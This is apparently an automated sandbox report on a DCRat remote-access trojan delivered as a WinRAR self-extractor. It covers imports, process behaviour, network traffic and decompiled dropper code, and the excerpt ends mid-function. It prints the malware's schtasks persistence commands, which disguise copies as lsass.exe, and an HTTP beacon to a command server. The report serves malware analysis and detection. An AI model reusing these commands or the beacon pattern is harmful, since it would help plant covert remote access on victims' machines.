LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer

gdiplus.dll

GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2022 19:15:28.995527983 CET	49780	80	192.168.2.4	47.254.235.229
Jan 14, 2022 19:15:29.257647991 CET	80	49780	47.254.235.229	192.168.2.4
Jan 14, 2022 19:15:29.259288073 CET	49780	80	192.168.2.4	47.254.235.229
Jan 14, 2022 19:15:29.795423985 CET	49780	80	192.168.2.4	47.254.235.229
Jan 14, 2022 19:15:30.061341047 CET	80	49780	47.254.235.229	192.168.2.4

HTTP Request Dependency Graph

47.254.235.229

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49780	47.254.235.229	80	C:\Users\user\Pictures\Camera Roll\lsass.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 19:15:29.795423985 CET	1519	OUT	GET /7/Universal/HttpFlower1Track/BigloadpacketCdn/localSecure/eternalPipebigloadsqldownloads.php?8QZesf4BjPtJwMxRC1=1cEHj6AVuwEa1lJXnITm&E9EC=WXKg&p6jKF4I=isJKPez2imzKItPhxc9FejmLNj&ad86a6d64cd9a9c991d6459f2f76c879=2c265b3bebbb4f72fb0a4abcd42fd52d&7ff5ed2a3db2907b96c3c5c975e1934b=wYiFDMykTM1ATZzUGZhVGN2cjYlFmM0YzNwEGMjNGMiRzYhJDZ1IzM&8QZesf4BjPtJwMxRC1=1cEHj6AVuwEa1lJXnITm&E9EC=WXKg&p6jKF4I=isJKPez2imzKItPhxc9FejmLNj HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 47.254.235.229 Connection: Keep-Alive

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe PID: 6580 Parent PID: 4112

General

Start time:	19:14:34
Start date:	14/01/2022
Path:	C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe"
Imagebase:	0x1000000
File size:	1322142 bytes
MD5 hash:	A4D367F98A1FA3E594AF0875379BDA39
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: wscript.exe PID: 6628 Parent PID: 6580

General

Start time:	19:14:36
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\refhostperfdllCommon\mbuli7h5qN.vbe"
Imagebase:	0x10000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5360 Parent PID: 6628

General

Start time:	19:14:43
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\refhostperfdllCommon\rSX3yp.bat" "
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5332 Parent PID: 5360

General

Start time:	19:14:44
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: refhostperfdllCommonsessionnetsvc.exe PID: 744 Parent PID: 5360

General

Start time:	19:14:44
Start date:	14/01/2022
Path:	C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe
Wow64 process (32bit):	false
Commandline:	C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe
Imagebase:	0xda0000
File size:	1005056 bytes
MD5 hash:	4E66AE5C311A1AADC1241790C112525F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.713915438.0000000013171000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000007.00000002.714469777.0000000013283000.00000004.00000001.sdmp, Author: Florian Roth
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 2572 Parent PID: 5060

General

Start time:	19:14:51
Start date:	14/01/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "wjIuhVBtfHXnMCZlWDoj" /sc ONLOGON /tr "'C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7e8c30000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: wjIuhVBtfHXnMCZlWDoj.exe PID: 6632 Parent PID: 968

General

Start time:	19:14:52
Start date:	14/01/2022
Path:	C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe
Imagebase:	0x2b0000
File size:	1005056 bytes
MD5 hash:	4E66AE5C311A1AADC1241790C112525F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000A.00000002.727189288.0000000012551000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 6560 Parent PID: 5060

General

Start time:	19:14:52
Start date:	14/01/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Windows\System32\umdmxfrm\backgroundTaskHost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7e8c30000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 6276 Parent PID: 5060

General

Start time:	19:14:53
Start date:	14/01/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Documents and Settings\user\Pictures\Camera Roll\lsass.exe'" /rl HIGHEST /f
Imagebase:	0x7ff7e8c30000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: refhostperfdllCommonsessionnetsvc.exe PID: 5292 Parent PID: 744

General

Start time:	19:14:55
Start date:	14/01/2022
Path:	C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe
Wow64 process (32bit):	false
Commandline:	"C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe"
Imagebase:	0x980000
File size:	1005056 bytes
MD5 hash:	4E66AE5C311A1AADC1241790C112525F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000D.00000002.732824643.0000000012DE1000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: lsass.exe PID: 2936 Parent PID: 968

General

Start time:	19:14:55
Start date:	14/01/2022
Path:	C:\Users\user\Pictures\Camera Roll\lsass.exe
Wow64 process (32bit):	false
Commandline:	C:\Documents and Settings\user\Pictures\Camera Roll\lsass.exe
Imagebase:	0x7c0000
File size:	1005056 bytes
MD5 hash:	4E66AE5C311A1AADC1241790C112525F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000F.00000002.743281064.0000000012CB1000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: wjIuhVBtfHXnMCZlWDoj.exe PID: 1744 Parent PID: 3424

General

Start time:	19:15:05
Start date:	14/01/2022
Path:	C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe"
Imagebase:	0x30000
File size:	1005056 bytes
MD5 hash:	4E66AE5C311A1AADC1241790C112525F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000012.00000002.753888327.0000000012461000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: lsass.exe PID: 1680 Parent PID: 3424

General

Start time:	19:15:21
Start date:	14/01/2022
Path:	C:\Users\user\Pictures\Camera Roll\lsass.exe
Wow64 process (32bit):	false
Commandline:	"C:\Documents and Settings\user\Pictures\Camera Roll\lsass.exe"
Imagebase:	0xb00000
File size:	1005056 bytes
MD5 hash:	4E66AE5C311A1AADC1241790C112525F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.935822946.0000000012FB1000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000014.00000002.935944649.0000000013028000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe PID: 6580 Parent PID: 4112 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCOMMON

Execution Graph

Execution Coverage:	9.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.3%
Total number of Nodes:	1493
Total number of Limit Nodes:	41

Executed Functions

Function 0101D5D4, Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 197
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 16%

			E0101D5D4(void* __edx, void* __ebp, void* __eflags, void* __fp0, void* _a84, void* _a86, void* _a90, void* _a92, void* _a94, void* _a96, void* _a98, void* _a100, void* _a104, void* _a144, void* _a148, void* _a196) {
				char _v208;
				void* __ebx;
				void* __edi;
				void* _t41;
				void* _t42;
				long _t51;
				void* _t54;
				intOrPtr _t58;
				struct HWND__* _t74;
				void* _t75;
				WCHAR* _t94;
				struct HINSTANCE__* _t95;
				intOrPtr _t96;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t121;

				_t121 = __fp0;
				_t99 = __ebp;
				_t88 = __edx;
				E010100CF(__edx, 1);
				E01019DA4("C:\Users\jones\Desktop", 0x800);
				E0101A335( &_v208); // executed
				E010113B3(0x10481e0);
				_t74 = 0;
				E0101F350(0x7104, 0x1056b80, 0, 0x7104);
				_t102 = _t101 + 0xc;
				_t94 = GetCommandLineW();
				_t106 = _t94;
				if(_t94 != 0) {
					_push(_t94);
					E0101BC84(0, _t106);
					if( *0x104a471 == 0) {
						E0101D287(__eflags, _t94); // executed
					} else {
						_push(__ebp);
						_t100 = OpenFileMappingW(0xf001f, 0, L"winrarsfxmappingfile.tmp");
						if(_t100 != 0) {
							UnmapViewOfFile(_t75);
							_t74 = 0;
						}
						CloseHandle(_t100);
						_pop(_t99);
					}
				}
				GetModuleFileNameW(_t74, 0x105dc90, 0x800);
				SetEnvironmentVariableW(L"sfxname", 0x105dc90); // executed
				GetLocalTime(_t102 + 0xc);
				_push( *(_t102 + 0x1a) & 0x0000ffff);
				_push( *(_t102 + 0x1c) & 0x0000ffff);
				_push( *(_t102 + 0x1e) & 0x0000ffff);
				_push( *(_t102 + 0x20) & 0x0000ffff);
				_push( *(_t102 + 0x22) & 0x0000ffff);
				_push( *(_t102 + 0x22) & 0x0000ffff);
				E0100400A(_t102 + 0x9c, 0x32, L"%4d-%02d-%02d-%02d-%02d-%02d-%03d",  *(_t102 + 0x24) & 0x0000ffff);
				_t103 = _t102 + 0x28;
				SetEnvironmentVariableW(L"sfxstime", _t103 + 0x7c);
				_t95 = GetModuleHandleW(_t74);
				 *0x1040ed4 = _t95;
				 *0x1040ed0 = _t95; // executed
				_t41 = LoadIconW(_t95, 0x64); // executed
				 *0x104c574 = _t41; // executed
				_t42 = E0101ADED(0x10481e0, _t88, _t121); // executed
				 *0x1056b7c = _t42;
				E0100D31C(0x1040ee8, _t88, _t99, 0x105dc90);
				E01018835(0);
				E01018835(0);
				 *0x1048440 = _t103 + 0x5c;
				 *0x1048444 = _t103 + 0x30; // executed
				DialogBoxParamW(_t95, L"STARTDLG", _t74, E0101AEE0, _t74); // executed
				 *0x1048444 = _t74;
				 *0x1048440 = _t74;
				E010188F3(_t103 + 0x24);
				E010188F3(_t103 + 0x50);
				_t51 =  *0x105eca0;
				if(_t51 != 0) {
					Sleep(_t51);
				}
				if( *0x1049468 != 0) {
					E0101A544(0x105dc90);
				}
				E0100EB27(0x1056a78);
				if( *0x104843c > 0) {
					L010235CE( *0x1048438);
				}
				DeleteObject( *0x104c574);
				_t54 =  *0x1056b7c;
				if(_t54 != 0) {
					DeleteObject(_t54);
				}
				if( *0x1040f50 == 0 &&  *0x1048450 != 0) {
					E01006FC6(0x1040f50, 0xff);
				}
				_t55 =  *0x105eca4;
				 *0x1048450 = 1;
				if( *0x105eca4 != 0) {
					E0101D2E6(_t55);
					CloseHandle( *0x105eca4);
				}
				_t96 =  *0x1040f50; // 0x0
				if( *0x105ec99 != 0) {
					_t58 =  *0x103e5fc; // 0x3e8
					if( *0x105ec9a == 0) {
						__eflags = _t58;
						if(_t58 < 0) {
							_t96 = _t96 - _t58;
							__eflags = _t96;
						}
					} else {
						_t96 =  *0x105ec9c;
						if(_t58 > 0) {
							_t96 = _t96 + _t58;
						}
					}
				}
				E0101A39D(_t103 + 0x1c); // executed
				return _t96;
			}

0x0101d5d4
0x0101d5d4
0x0101d5d4
0x0101d5df
0x0101d5ee
0x0101d5f7
0x0101d601
0x0101d60b
0x0101d614
0x0101d619
0x0101d622
0x0101d624
0x0101d626
0x0101d628
0x0101d629
0x0101d634
0x0101d6a1
0x0101d636
0x0101d636
0x0101d649
0x0101d64d
0x0101d68e
0x0101d694
0x0101d694
0x0101d697
0x0101d69d
0x0101d69d
0x0101d634
0x0101d6b2
0x0101d6be
0x0101d6c9
0x0101d6d4
0x0101d6da
0x0101d6e0
0x0101d6e6
0x0101d6ec
0x0101d6f2
0x0101d708
0x0101d70d
0x0101d71a
0x0101d727
0x0101d72c
0x0101d732
0x0101d738
0x0101d73e
0x0101d743
0x0101d74e
0x0101d753
0x0101d75c
0x0101d765
0x0101d775
0x0101d784
0x0101d789
0x0101d793
0x0101d799
0x0101d79f
0x0101d7a8
0x0101d7ad
0x0101d7b4
0x0101d7b7
0x0101d7b7
0x0101d7c4
0x0101d7c6
0x0101d7c6
0x0101d7d0
0x0101d7dc
0x0101d7e4
0x0101d7e9
0x0101d7f0
0x0101d7f6
0x0101d7fd
0x0101d800
0x0101d800
0x0101d80d
0x0101d822
0x0101d822
0x0101d827
0x0101d82c
0x0101d835
0x0101d838
0x0101d843
0x0101d843
0x0101d850
0x0101d856
0x0101d85f
0x0101d864
0x0101d874
0x0101d876
0x0101d878
0x0101d878
0x0101d878
0x0101d866
0x0101d866
0x0101d86e
0x0101d870
0x0101d870
0x0101d86e
0x0101d864
0x0101d87e
0x0101d88e

APIs

Part of subcall function 010100CF: GetModuleHandleW.KERNEL32(kernel32), ref: 010100E4
Part of subcall function 010100CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 010100F6
Part of subcall function 010100CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 01010127

Part of subcall function 01019DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 01019DAC

Part of subcall function 0101A335: OleInitialize.OLE32(00000000), ref: 0101A34E
Part of subcall function 0101A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0101A385
Part of subcall function 0101A335: SHGetMalloc.SHELL32(01048430), ref: 0101A38F

Part of subcall function 010113B3: GetCPInfo.KERNEL32(00000000,?), ref: 010113C4
Part of subcall function 010113B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 010113D8

GetCommandLineW.KERNEL32 ref: 0101D61C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0101D643
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0101D654
UnmapViewOfFile.KERNEL32(00000000), ref: 0101D68E

Part of subcall function 0101D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0101D29D
Part of subcall function 0101D287: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0101D2D9

CloseHandle.KERNEL32(00000000), ref: 0101D697
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe,00000800), ref: 0101D6B2
SetEnvironmentVariableW.KERNELBASE(sfxname,C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe), ref: 0101D6BE
GetLocalTime.KERNEL32(?), ref: 0101D6C9
_swprintf.LIBCMT ref: 0101D708
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0101D71A
GetModuleHandleW.KERNEL32(00000000), ref: 0101D721
LoadIconW.USER32(00000000,00000064), ref: 0101D738
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 0101D789
Sleep.KERNEL32(?), ref: 0101D7B7
DeleteObject.GDI32 ref: 0101D7F0
DeleteObject.GDI32(?), ref: 0101D800
CloseHandle.KERNEL32 ref: 0101D843

Strings

sfxname, xrefs: 0101D6B9
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 0101D6F9
STARTDLG, xrefs: 0101D77E
sfxstime, xrefs: 0101D715
winrarsfxmappingfile.tmp, xrefs: 0101D637
C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe, xrefs: 0101D6AB, 0101D6B0, 0101D6B8, 0101D748
C:\Users\user\Desktop, xrefs: 0101D5E9

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 788466649-1360500801
Opcode ID: be70160afd294b8e125484013d30433715fec2da0f3741f2aca9334b6ca6a4bd
Instruction ID: 6efe6768a3e007ac60777b43882541b744af1a62b42f3a9e3785fc4dc0bb06cd
Opcode Fuzzy Hash: be70160afd294b8e125484013d30433715fec2da0f3741f2aca9334b6ca6a4bd
Instruction Fuzzy Hash: 4961C2B1904341AFE330ABE5E988B6B7BECBB94700F004429FAC59614DDB7EC944C761

Uniqueness

Uniqueness Score: -1.00%

Function 01019E1C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E01019E1C(WCHAR* _a4) {
				char _v4;
				char _v8;
				char _v20;
				intOrPtr* _v28;
				void* __ecx;
				struct HRSRC__* _t14;
				char _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				intOrPtr* _t26;
				char* _t33;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				long _t44;
				intOrPtr* _t46;
				struct HRSRC__* _t47;

				_t14 = FindResourceW( *0x1040ed0, _a4, "PNG");
				_t47 = _t14;
				if(_t47 == 0) {
					return _t14;
				}
				_t44 = SizeofResource( *0x1040ed0, _t47);
				if(_t44 == 0) {
					L4:
					_t16 = 0;
					L16:
					return _t16;
				}
				_t17 = LoadResource( *0x1040ed0, _t47);
				if(_t17 == 0) {
					goto L4;
				}
				_t18 = LockResource(_t17);
				_t48 = _t18;
				if(_t18 != 0) {
					_v4 = 0;
					_t19 = GlobalAlloc(2, _t44); // executed
					_t35 = _t19;
					if(_t35 == 0) {
						L15:
						_t16 = _v4;
						goto L16;
					}
					if(GlobalLock(_t35) == 0) {
						L14:
						GlobalFree(_t35);
						goto L15;
					}
					E0101F4B0(_t20, _t48, _t44);
					_v8 = 0;
					_push( &_v8);
					_push(0);
					_push(_t35);
					if( *0x1062178() == 0) {
						_t26 = E01019D7B(_t24, _t37, _v20, 0); // executed
						_t38 = _v28;
						_t46 = _t26;
						 *0x1033260(_t38);
						 *((intOrPtr*)( *((intOrPtr*)( *_t38 + 8))))();
						if(_t46 != 0) {
							 *((intOrPtr*)(_t46 + 8)) = 0;
							if( *((intOrPtr*)(_t46 + 8)) == 0) {
								_push(0xffffff);
								_t33 =  &_v20;
								_push(_t33);
								_push( *((intOrPtr*)(_t46 + 4)));
								L0101E238(); // executed
								if(_t33 != 0) {
									 *((intOrPtr*)(_t46 + 8)) = _t33;
								}
							}
							 *0x1033260(1);
							 *((intOrPtr*)( *((intOrPtr*)( *_t46))))();
						}
					}
					GlobalUnlock(_t35);
					goto L14;
				}
				goto L4;
			}

0x01019e2e
0x01019e34
0x01019e38
0x01019f32
0x01019f32
0x01019e4c
0x01019e50
0x01019e70
0x01019e70
0x01019f2e
0x00000000
0x01019f2e
0x01019e59
0x01019e61
0x00000000
0x00000000
0x01019e64
0x01019e6a
0x01019e6e
0x01019e7e
0x01019e82
0x01019e88
0x01019e8c
0x01019f28
0x01019f28
0x00000000
0x01019f2d
0x01019e9b
0x01019f21
0x01019f22
0x00000000
0x01019f22
0x01019ea4
0x01019eac
0x01019eb4
0x01019eb5
0x01019eb6
0x01019ebf
0x01019ec6
0x01019ecb
0x01019ecf
0x01019ed9
0x01019edf
0x01019ee3
0x01019ee8
0x01019eed
0x01019eef
0x01019ef4
0x01019ef8
0x01019ef9
0x01019efc
0x01019f03
0x01019f05
0x01019f05
0x01019f03
0x01019f10
0x01019f18
0x01019f18
0x01019ee3
0x01019f1b
0x00000000
0x01019f1b
0x00000000

APIs

FindResourceW.KERNEL32(0101AE4D,PNG,?,?,?,0101AE4D,00000066), ref: 01019E2E
SizeofResource.KERNEL32(00000000,00000000,?,?,?,0101AE4D,00000066), ref: 01019E46
LoadResource.KERNEL32(00000000,?,?,?,0101AE4D,00000066), ref: 01019E59
LockResource.KERNEL32(00000000,?,?,?,0101AE4D,00000066), ref: 01019E64
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0101AE4D,00000066), ref: 01019E82
GlobalLock.KERNEL32 ref: 01019E93
GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 01019EFC
GlobalUnlock.KERNEL32(00000000), ref: 01019F1B
GlobalFree.KERNEL32 ref: 01019F22

Strings

PNG, xrefs: 01019E1F

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
String ID: PNG
API String ID: 4097654274-364855578
Opcode ID: ec5e92ce79338719c6b58eaf9940ed9ec32defb703f1113444923e608cf2c7f9
Instruction ID: 143e9f23a301d8bd68b58ca48b5a1fdd8a3cb5c50b9e887e1c9b9a88078d3848
Opcode Fuzzy Hash: ec5e92ce79338719c6b58eaf9940ed9ec32defb703f1113444923e608cf2c7f9
Instruction Fuzzy Hash: C031A175204302AFD7219F65DC9895BBFEDFF89755B04051CF982D6258DB3AD800CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0100A5F4, Relevance: 7.6, APIs: 5, Instructions: 107
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0100A5F4(void* __edx, intOrPtr _a4, intOrPtr _a8, char _a32, short _a592, void* _a4692, WCHAR* _a4696, intOrPtr _a4700) {
				struct _WIN32_FIND_DATAW _v0;
				char _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _t43;
				signed int _t49;
				signed int _t63;
				void* _t65;
				long _t68;
				char _t69;
				void* _t73;
				signed int _t74;
				void* _t75;
				void* _t81;
				intOrPtr _t83;
				void* _t86;

				_t81 = __edx;
				E0101E360();
				_push(_t74);
				_t86 = _a4692;
				_t83 = _a4700;
				_t75 = _t74 | 0xffffffff;
				_push( &_v0);
				if(_t86 != _t75) {
					_t43 = FindNextFileW(_t86, ??);
					__eflags = _t43;
					if(_t43 == 0) {
						_t86 = _t75;
						_t63 = GetLastError();
						__eflags = _t63 - 0x12;
						_t11 = _t63 != 0x12;
						__eflags = _t11;
						 *((char*)(_t83 + 0x1044)) = _t63 & 0xffffff00 | _t11;
					}
					__eflags = _t86 - _t75;
					if(_t86 != _t75) {
						goto L13;
					}
				} else {
					_t65 = FindFirstFileW(_a4696, ??); // executed
					_t86 = _t65;
					if(_t86 != _t75) {
